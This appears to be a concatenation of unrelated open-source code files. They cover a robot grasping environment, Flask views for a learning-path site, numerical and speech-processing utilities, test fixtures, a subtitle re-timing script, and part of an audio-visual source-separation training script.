elif rand_pos == 20:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 21:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 22:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 23:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 24:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 25:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 26:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 27:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 28:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 29:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 30:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif obj == 2:
if rand_pos == 1:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 2:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 3:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 4:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 5:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 6:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 7:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 8:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 9:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 10:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 11:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 12:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 13:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 14:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 15:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 16:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 17:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 18:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 19:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 20:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 21:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 22:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 23:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 24:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 25:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 26:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 27:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 28:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 29:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 30:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif obj == 3:
if rand_pos == 1:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 2:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 3:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 4:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 5:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 6:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 7:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 8:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 9:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 10:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 11:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 12:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 13:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 14:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 15:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 16:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 17:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 18:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 19:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 20:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 21:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 22:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 23:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 24:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 25:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 26:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 27:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 28:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 29:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 30:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif obj == 4:
if rand_pos == 1:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 2:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 3:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 4:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 5:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 6:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 7:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 8:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 9:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 10:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 11:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 12:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 13:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 14:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 15:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 16:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 17:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 18:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 19:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 20:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 21:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 22:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 23:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 24:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 25:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 26:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 27:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 28:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 29:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 30:
Joint_state = [0, 0, 0, 0, 0, 0,0]
self.kinova_rob.go_to_joint_state(tuple(Joint_state))
states = self.get_obs()
return states
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
#Function to step the hardware forward in time
def step(self, action):
total_reward = 0
self.finger_pos_goal = FingerPosition()
self.finger_pos_goal.finger1 = action[0]
self.finger_pos_goal.finger2 = action[1]
self.finger_pos_goal.finger3 = action[2]
self.finger_command_pub.publish(self.finger_pos_goal)
while not rospy.get_param('exec_done'):
rospy.sleep(0.1)
obs = self.get_obs()
### Get this reward for RL training ###
total_reward, info, done = self.get_reward()
### Get this reward for grasp classifier collection ###
#total_reward, info, done = self.get_reward_DataCollection()
return obs, total_reward, done, info
def joint_state_callback(self, msg):
self.joint_states = msg
def finger_state_callback(self, msg):
self.finger_pos = msg
def object_pose_callback(self, msg):
self.object_pose = msg
class GraspValid_net(nn.Module):
def __init__(self, state_dim):
super(GraspValid_net, self).__init__()
self.l1 = nn.Linear(state_dim, 256)
self.l2 = nn.Linear(256, 256)
self.l3 = nn.Linear(256, 1)
def forward(self, state):
# pdb.set_trace()
a = F.relu(self.l1(state))
a = F.relu(self.l2(a))
a = torch.sigmoid(self.l3(a))
return a
|
StarcoderdataPython
|
1650510
|
<reponame>linkolearn/linkolearn
from shopyo.api.module import ModuleHelp
from flask import render_template
from flask import url_for
from flask import redirect
from flask import flash
from flask import request
from flask import jsonify
# from shopyo.api.html import notify_success
# from shopyo.api.forms import flash_errors
from flask_login import login_required
from flask_login import current_user
from modules.box__default.auth.models import User
from modules.box__linkolearn.linkolearn.models import Path
from modules.box__linkolearn.linkolearn.models import Section
from modules.box__linkolearn.linkolearn.models import Link
from modules.box__linkolearn.linkolearn.models import LikeList
from modules.box__linkolearn.linkolearn.models import BookmarkList
from modules.box__linkolearn.linkolearn.models import Emoji
from modules.box__linkolearn.linkolearn.forms import ChangeNameForm
from modules.box__linkolearn.linkolearn.forms import ChangePasswordForm
from shopyo.api.security import get_safe_redirect
from shopyo.api.forms import flash_errors
from shopyo.api.html import notify
import validators
mhelp = ModuleHelp(__file__, __name__)
globals()[mhelp.blueprint_str] = mhelp.blueprint
module_blueprint = globals()[mhelp.blueprint_str]
@module_blueprint.route("/")
def index():
return mhelp.info['display_string']
@module_blueprint.route("/like/<path_id>", methods=["GET"])
@login_required
def toggle_like(path_id):
path = Path.query.get(path_id)
if path.like_list is None:
path.like_list = LikeList()
path.save()
if current_user not in path.like_list.users:
path.like_list.users.append(current_user)
else:
path.like_list.users.remove(current_user)
path.save()
if 'next' in request.args:
if request.args.get('next') != '':
return redirect(get_safe_redirect(request.args.get('next')))
else:
return redirect(url_for('www.index'))
else:
return redirect(url_for('www.index'))
@module_blueprint.route("/bookmark/<path_id>", methods=["GET"])
@login_required
def toggle_bookmark(path_id):
path = Path.query.get(path_id)
if path.bookmark_list is None:
path.bookmark_list = BookmarkList()
path.save()
if current_user not in path.bookmark_list.users:
path.bookmark_list.users.append(current_user)
else:
path.bookmark_list.users.remove(current_user)
path.save()
if 'next' in request.args:
if request.args.get('next') != '':
return redirect(get_safe_redirect(request.args.get('next')))
else:
return redirect(url_for('www.index'))
else:
return redirect(url_for('www.index'))
@module_blueprint.route("/visibility/<path_id>", methods=["GET"])
@login_required
def toggle_visibility(path_id):
path = Path.query.get(path_id)
if path.is_visible == True:
path.is_visible = False
elif path.is_visible == False:
path.is_visible = True
path.update()
if 'next' in request.args:
if request.args.get('next') != '':
return redirect(get_safe_redirect(request.args.get('next')))
else:
return redirect(url_for('www.index'))
else:
return redirect(url_for('www.index'))
@module_blueprint.route("/settings", methods=["GET"])
@login_required
def settings():
context = {}
password_form = ChangePasswordForm()
name_form = ChangeNameForm()
emoji_classes = Emoji.query.all()
context.update({
'password_form': password_form,
'name_form': name_form,
'emoji_classes': emoji_classes
})
return render_template('linkolearn_theme/templates/profile_settings.html', **context)
@module_blueprint.route("/settings/password", methods=["POST"])
@login_required
def change_password():
form = ChangePasswordForm()
if not form.validate_on_submit():
flash_errors(form)
if not form.password1.data == form.password2.data:
flash(notify('Passwords must be same', alert_type='success'))
return mhelp.redirect_url(mhelp.info['module_name']+'.settings')
current_user.password = <PASSWORD>.data
current_user.save()
return mhelp.redirect_url(mhelp.info['module_name']+'.settings')
@module_blueprint.route("/settings/name", methods=["POST"])
@login_required
def change_name():
form = ChangeNameForm()
if not form.validate_on_submit():
flash_errors(form)
return mhelp.redirect_url(mhelp.info['module_name']+'.settings')
current_user.first_name = form.first_name.data
current_user.last_name = form.last_name.data
current_user.save()
return mhelp.redirect_url(mhelp.info['module_name']+'.settings')
@module_blueprint.route("/settings/emoji", methods=["POST"])
@login_required
def change_emoji():
emoji_classes = [_.class_name for _ in Emoji.query.all()]
target_class = request.form['emoji_class'].strip()
if not target_class in emoji_classes:
flash(notify('Emoji class not found', alert_type='warning'))
return mhelp.redirect_url(mhelp.info['module_name']+'.settings')
current_user.emoji_class = target_class
current_user.save()
return mhelp.redirect_url(mhelp.info['module_name']+'.settings')
def sectionlinks2str(section_links):
return ' '.join([_.url for _ in section_links])
@module_blueprint.route("/settings/p/<path_id>/edit", methods=["GET", "POST"])
@login_required
def edit_path(path_id):
path = Path.query.get(path_id)
if not path.path_user == current_user:
return jsonify({'error': 'x'})
if request.method == 'GET':
context = {}
context.update({
'path': path,
'sectionlinks2str': sectionlinks2str
})
return render_template('linkolearn_theme/templates/edit.html', **context)
if request.method == 'POST':
json_submit = request.get_json()
path_title = json_submit['path_title']
path_link = json_submit['path_link']
sections = json_submit['sections']
path.sections = []
path.title = path_title
path.slug = path_link
for sec in sections:
section = Section()
sec_title = sec['section_title']
section.title = sec_title
sec_links = sec['section_links']
if sec_links.strip() != '' and '\n' in sec_links:
urls = sec_links.split('\n')
urls = list((url for url in urls if validators.url(url)))
section.links = list((Link(url=url) for url in urls))
path.sections.append(section)
path.save()
next_url = url_for('www.path', username=current_user.username, path_slug=path.slug)
return jsonify({'goto': next_url})
@module_blueprint.route("/bookmarks", methods=["GET", "POST"])
@login_required
def bookmarks():
return render_template('linkolearn_theme/templates/bookmarks.html')
|
StarcoderdataPython
|
155313
|
<filename>fdm-devito-notebooks/01_vib/exer-vib/vib_conv_rate.py
import numpy as np
import matplotlib.pyplot as plt
from vib_verify_mms import solver
def u_exact(t, I, V, A, f, c, m):
"""Found by solving mu'' + cu = F in Wolfram alpha."""
k_1 = I
k_2 = (V - A*2*np.pi*f/(c - 4*np.pi**2*f**2*m))*\
np.sqrt(m/float(c))
return A*np.sin(2*np.pi*f*t)/(c - 4*np.pi**2*f**2*m) + \
k_2*np.sin(np.sqrt(c/float(m))*t) + \
k_1*np.cos(np.sqrt(c/float(m))*t)
def convergence_rates(N, solver_function, num_periods=8):
"""
Returns N-1 empirical estimates of the convergence rate
based on N simulations, where the time step is halved
for each simulation.
solver_function(I, V, F, c, m, dt, T, damping) solves
each problem, where T is based on simulation for
num_periods periods.
"""
def F(t):
"""External driving force"""
return A*np.sin(2*np.pi*f*t)
b, c, m = 0, 1.6, 1.3 # just some chosen values
I = 0 # init. cond. u(0)
V = 0 # init. cond. u'(0)
A = 1.0 # amplitude of driving force
f = 1.0 # chosen frequency of driving force
damping = 'zero'
P = 1/f
dt = P/30 # 30 time step per period 2*pi/w
T = P*num_periods
dt_values = []
E_values = []
for i in range(N):
u, t = solver_function(I, V, F, b, c, m, dt, T, damping)
u_e = u_exact(t, I, V, A, f, c, m)
E = np.sqrt(dt*np.sum((u_e-u)**2))
dt_values.append(dt)
E_values.append(E)
dt = dt/2
#plt.plot(t, u, 'b--', t, u_e, 'r-'); plt.grid(); plt.show()
r = [np.log(E_values[i-1]/E_values[i])/
np.log(dt_values[i-1]/dt_values[i])
for i in range(1, N, 1)]
print r
return r
def test_convergence_rates():
r = convergence_rates(
N=5,
solver_function=solver,
num_periods=8)
# Accept rate to 1 decimal place
tol = 0.1
assert abs(r[-1] - 2.0) < tol
if __name__ == '__main__':
test_convergence_rates()
|
StarcoderdataPython
|
1693483
|
<gh_stars>100-1000
import pytest
def test_upgrade_chip_replication_quality_metric_1_2(upgrader, chip_replication_quality_metric_1):
value = upgrader.upgrade(
"chip_replication_quality_metric",
chip_replication_quality_metric_1,
current_version="1",
target_version="2",
)
assert value["schema_version"] == "2"
assert value.get("idr_dispersion_plot") == "ENCFF002DSJ.raw.srt.filt.nodup.srt.filt.nodup.sample.15.SE.tagAlign.gz.cc.plot.pdf"
assert 'IDR_dispersion_plot' not in value
|
StarcoderdataPython
|
3201177
|
<filename>tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hu_HU-2019] 1.py<gh_stars>10-100
[
{
'date': '2019-01-01',
'description': 'Újév',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-03-15',
'description': 'Az 1848-as forradalom ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-04-19',
'description': 'Nagypéntek',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-04-21',
'description': 'Húsvét',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-04-22',
'description': 'Húsvéthétfő',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-05-01',
'description': 'A munka ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-06-09',
'description': 'Pünkösd',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-06-10',
'description': 'Pünkösdhétfő',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-08-19',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-08-10 pihenőnap',
'region': '',
'type': 'NF'
},
{
'date': '2019-08-20',
'description': 'Az államalapítás ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-10-23',
'description': 'Az 1956-os forradalom ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-11-01',
'description': 'Mindenszentek',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-24',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-12-07 pihenőnap',
'region': '',
'type': 'NF'
},
{
'date': '2019-12-25',
'description': 'Karácsony',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-26',
'description': 'Karácsony',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-27',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-12-14 pihenőnap',
'region': '',
'type': 'NF'
}
]
|
StarcoderdataPython
|
34082
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from deepspeech.frontend.utility import IGNORE_ID
from deepspeech.io.utility import pad_sequence
from deepspeech.utils.log import Log
__all__ = ["SpeechCollator"]
logger = Log(__name__).getlog()
class SpeechCollator():
def __init__(self, keep_transcription_text=True):
"""
Padding audio features with zeros to make them have the same shape (or
a user-defined shape) within one bach.
if ``keep_transcription_text`` is False, text is token ids else is raw string.
"""
self._keep_transcription_text = keep_transcription_text
def __call__(self, batch):
"""batch examples
Args:
batch ([List]): batch is (audio, text)
audio (np.ndarray) shape (D, T)
text (List[int] or str): shape (U,)
Returns:
tuple(audio, text, audio_lens, text_lens): batched data.
audio : (B, Tmax, D)
audio_lens: (B)
text : (B, Umax)
text_lens: (B)
"""
audios = []
audio_lens = []
texts = []
text_lens = []
for audio, text in batch:
# audio
audios.append(audio.T) # [T, D]
audio_lens.append(audio.shape[1])
# text
# for training, text is token ids
# else text is string, convert to unicode ord
tokens = []
if self._keep_transcription_text:
assert isinstance(text, str), (type(text), text)
tokens = [ord(t) for t in text]
else:
tokens = text # token ids
tokens = tokens if isinstance(tokens, np.ndarray) else np.array(
tokens, dtype=np.int64)
texts.append(tokens)
text_lens.append(tokens.shape[0])
padded_audios = pad_sequence(
audios, padding_value=0.0).astype(np.float32) #[B, T, D]
audio_lens = np.array(audio_lens).astype(np.int64)
padded_texts = pad_sequence(
texts, padding_value=IGNORE_ID).astype(np.int64)
text_lens = np.array(text_lens).astype(np.int64)
return padded_audios, audio_lens, padded_texts, text_lens
|
StarcoderdataPython
|
1662162
|
<reponame>mporcheron/pyfeedbacker
# -*- coding: utf-8 -*-
from collections import OrderedDict
import abc
class AbstractModelContainer(OrderedDict):
def __init__(self,
root_model,
child_data_type = None,
parent_data_id = None):
"""Base class for storing data by ID. Its expected that any specific
data type will extended this class and provide the data container type through calling `__init__` on `super()`.
This is essentially an `collections.OrderedDict`.
Keyword arguments:
root_model -- The root model object.
child_data_type -- A data type that will be stored inside this
container. New data will be initialised to an instance of this type.
parent_data_id -- ID of the parent data container, if it exists.
"""
self._root_model = root_model
self._child_data_type = child_data_type
self._parent_data_id = parent_data_id
def __getitem__(self, data_id):
"""Retrieve an item using the square bracket syntax. If a particular
`data_id` doesn't exist, then one will be created with an initialised
value passed into `__init__`.
Arguments:
data_id -- Identifier for a piece of data, will be converted to a
string if it isn't already a string.
"""
data_id = str(data_id)
try:
return super().__getitem__(data_id)
except KeyError:
if self._child_data_type is None:
new_obj = None
elif issubclass(self._child_data_type, AbstractModelContainer):
new_obj = self._child_data_type(self._root_model,
parent_data_id = data_id)
else:
new_obj = self._child_data_type(self._root_model)
self.__setitem__(data_id, new_obj)
return new_obj
def __setitem__(self, data_id, value):
"""Set an item using the square bracket syntax.
Arguments:
data_id -- Identifier for a piece of data, will be converted to a
string if it isn't already a string.
value -- The value to store in the model.
"""
data_id = str(data_id)
# If value is inserted somewhere else, delete the existing one
try:
existing_index = list(self.values()).index(value)
existing_key = list(self.keys())[existing_index]
del self[existing_key]
except:
pass
# If the data_id is not correct inside value, change it
try:
child_parent_id = value._parent_data_id
if data_id != child_parent_id:
value._parent_data_id = data_id
except:
pass
return super().__setitem__(data_id, value)
def __contains__(self, data_id):
"""Determine if a particular `data_id` exists.
Arguments:
data_id -- Identifier for a piece of data, will be converted to a
string if it isn't already a string.
"""
data_id = str(data_id)
return super().__contains__(data_id)
dict = property(lambda self:self.__dict__(), doc="""
Retrieve a copy of the data as a new dictionary.
""")
@abc.abstractmethod
def __dict__(self):
"""Retrieve a copy of the data as a new dictionary."""
return dict(self.items())
def __repr__(self):
ret = f'{self.__class__.__name__}('
ret += str(list(self))
ret += ')'
return ret
class DataByStage(AbstractModelContainer):
def __init__(self, root_model, child_data_type, parent_data_id):
"""Create a container for storing data for each stage.
Arguments:
root_model -- The root model object.
child_data_type -- A data type that will be stored inside this
container. New data will be initialised to an instance of this type.
parent_data_id -- The identifier of the key in the parent container,
which in this case is the submission identifier.
"""
super().__init__(root_model = root_model,
child_data_type = child_data_type,
parent_data_id = parent_data_id)
submission = property(lambda self:self._parent_data_id, doc="""
Retrieve the submission identifier
""")
def __dict__(self):
"""Retrieve a copy of the data as a new dictionary."""
items = {}
for key, value in self.items():
items[key] = value.dict
return items
class Data(AbstractModelContainer):
pass
|
StarcoderdataPython
|
3278298
|
<filename>djangorestframework_hal/parsers.py<gh_stars>0
from .renderers import HalJSONRenderer
from .settings import api_settings
from .utils import parse_from_hal
class HalJSONParser(api_settings.PARSER_CLASS):
media_type = "application/hal+json"
renderer_class = HalJSONRenderer
def parse(self, stream, media_type=None, parser_context=None):
data = super().parse(stream, media_type, parser_context)
parsed_data = parse_from_hal(data)
return parsed_data
|
StarcoderdataPython
|
35063
|
#!/usr/bin/env python3
import sys
import os.path
import re
from datetime import date, datetime, time, timedelta
# helper
def is_timeformat(s):
p = re.compile('^[0-9]{2}:[0-9]{2}:[0-9]{2},[0-9]{3}$')
if p.match(s) is None:
return False
else:
return True
def is_time_line(l):
p = re.compile('^[0-9]{2}:')
m = p.match(l)
if m is None:
return False
else:
return True
def get_time(s):
dt = datetime.strptime(s, "%H:%M:%S,%f")
return dt.time()
def get_str(t):
return t.strftime("%H:%M:%S,%f")[:-3]
def add(t0, delta):
delta = timedelta(hours=delta.hour,
minutes=delta.minute,
seconds=delta.second,
microseconds=delta.microsecond)
dt = datetime.combine(date.today(), t0) + delta
return dt.time()
def sub(t0, delta):
delta = timedelta(hours=delta.hour,
minutes=delta.minute,
seconds=delta.second,
microseconds=delta.microsecond)
dt = datetime.combine(date.today(), t0) - delta
return dt.time()
def get_endpoints(l):
l = l.rstrip()
sep = re.compile("[ ]+-->[ ]+")
ts = sep.split(l)
return list(map(get_time, ts))
def transform_time_line(l, delta, sens):
es = get_endpoints(l)
tes = list()
for e in es:
if sens == '+':
tes.append(add(e, delta))
else:
tes.append(sub(e, delta))
return get_str(tes[0]) + " --> " + get_str(tes[1]) + "\n"
# main
if __name__ == "__main__":
filesrt = sys.argv[1]
if not os.path.isfile(filesrt):
print("ERROR: file isn't exist !")
exit(1)
filesrtnew = filesrt + ".new"
t0 = sys.argv[2]
if not is_timeformat(t0):
print("ERROR: t0 isn't correct !")
exit(1)
t0 = get_time(t0)
delta = 0
sens = ""
is_first_timeline = True
with open(filesrt) as inputf:
print("Reading {}".format(filesrt))
for l in inputf:
if is_time_line(l):
if is_first_timeline:
tt0 = get_endpoints(l)[0]
if tt0 > t0:
delta = sub(tt0, t0)
sens = '-'
print("Delta: -{}".format(get_str(delta)))
else:
delta = sub(t0, tt0)
sens = '+'
print("Delta: +{}".format(get_str(delta)))
is_first_timeline = False
with open(filesrtnew, "a") as outputf:
outputf.write(transform_time_line(l, delta, sens))
else:
with open(filesrtnew, "a") as outputf:
outputf.write(l)
print("Writing {}".format(filesrtnew))
|
StarcoderdataPython
|
74915
|
import os
import random
import time
import torch
import torch.nn.functional as F
import torch.nn as nn
import numpy as np
import scipy.io.wavfile as wavfile
import matplotlib
from mir_eval.separation import bss_eval_sources
from arguments import ArgParser
from dataset import MUSICMixDataset
from models import ModelBuilder, activate
from utils import AverageMeter, \
recover_rgb, magnitude2heatmap,\
istft_reconstruction, warpgrid, \
combine_video_audio, save_video, makedirs
from viz import plot_loss_loc_sep_acc_metrics
import matplotlib.pyplot as plt
import soundfile
import cv2
# Network wrapper, defines forward pass
class NetWrapper1(torch.nn.Module):
def __init__(self, nets):
super(NetWrapper1, self).__init__()
self.net_sound = nets
def forward(self, mags, mag_mix, args):
mag_mix = mag_mix + 1e-10
N = args.num_mix
B = mag_mix.size(0)
T = mag_mix.size(3)
# warp the spectrogram
if args.log_freq:
grid_warp = torch.from_numpy(
warpgrid(B, 256, T, warp=True)).to(args.device)
mag_mix = F.grid_sample(mag_mix, grid_warp)
for n in range(N):
mags[n] = F.grid_sample(mags[n], grid_warp)
# calculate loss weighting coefficient: magnitude of input mixture
if args.weighted_loss:
weight = torch.log1p(mag_mix)
weight = torch.clamp(weight, 1e-3, 10)
else:
weight = torch.ones_like(mag_mix)
# ground truth masks are computed after warpping!
gt_masks = [None for n in range(N)]
for n in range(N):
if args.binary_mask:
# for simplicity, mag_N > 0.5 * mag_mix
gt_masks[n] = (mags[n] > 0.5 * mag_mix).float()
else:
gt_masks[n] = mags[n] / mag_mix
# clamp to avoid large numbers in ratio masks
gt_masks[n].clamp_(0., 5.)
# LOG magnitude
log_mag_mix = torch.log(mag_mix).detach()
# forward net_sound
feat_sound = self.net_sound(log_mag_mix)
feat_sound = activate(feat_sound, args.sound_activation)
return feat_sound, \
{'gt_masks': gt_masks, 'mag_mix': mag_mix, 'mags': mags, 'weight': weight}
class NetWrapper2(torch.nn.Module):
def __init__(self, nets):
super(NetWrapper2, self).__init__()
self.net_frame = nets
def forward(self, frame, args):
N = args.num_mix
# return appearance features and appearance embedding
feat_frames = [None for n in range(N)]
emb_frames = [None for n in range(N)]
for n in range(N):
feat_frames[n], emb_frames[n] = self.net_frame.forward_multiframe_feat_emb(frame[n], pool=True)
emb_frames[n] = activate(emb_frames[n], args.img_activation)
return feat_frames, emb_frames
class NetWrapper3(torch.nn.Module):
def __init__(self, nets):
super(NetWrapper3, self).__init__()
self.net_avol = nets
def forward(self, feat_frame, feat_sound, args):
N = args.num_mix
pred_mask = [None for n in range(N)]
# appearance attention
for n in range(N):
pred_mask[n] = self.net_avol(feat_frame[n], feat_sound)
pred_mask[n] = activate(pred_mask[n], args.output_activation)
return pred_mask
# Calculate metrics
def calc_metrics(batch_data, pred_masks_, args):
# meters
sdr_mix_meter = AverageMeter()
sdr_meter = AverageMeter()
sir_meter = AverageMeter()
sar_meter = AverageMeter()
# fetch data and predictions
mag_mix = batch_data['mag_mix']
phase_mix = batch_data['phase_mix']
audios = batch_data['audios']
# unwarp log scale
N = args.num_mix
B = mag_mix.size(0)
pred_masks_linear = [None for n in range(N)]
for n in range(N):
if args.log_freq:
grid_unwarp = torch.from_numpy(
warpgrid(B, args.stft_frame//2+1, pred_masks_[0].size(3), warp=False)).to(args.device)
pred_masks_linear[n] = F.grid_sample(pred_masks_[n], grid_unwarp)
else:
pred_masks_linear[n] = pred_masks_[n]
# convert into numpy
mag_mix = mag_mix.numpy()
phase_mix = phase_mix.numpy()
for n in range(N):
pred_masks_linear[n] = pred_masks_linear[n].detach().cpu().numpy()
# threshold if binary mask
if args.binary_mask:
pred_masks_linear[n] = (pred_masks_linear[n] > args.mask_thres).astype(np.float32)
# loop over each sample
for j in range(B):
# save mixture
